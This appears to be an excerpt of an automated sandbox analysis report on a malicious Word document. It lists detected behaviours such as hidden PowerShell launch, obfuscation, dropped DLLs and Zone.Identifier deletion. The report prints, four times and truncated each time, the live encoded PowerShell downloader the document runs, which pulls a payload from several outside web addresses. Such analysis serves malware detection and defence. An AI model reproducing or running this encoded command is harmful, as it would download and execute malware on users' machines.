Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF002822CC pushad ; retf 5_2_000007FF00282381
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF00282350 pushad ; retf 5_2_000007FF00282381
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10008085 push ecx; ret 7_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004ADA push ecx; ret 7_2_10004AED

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
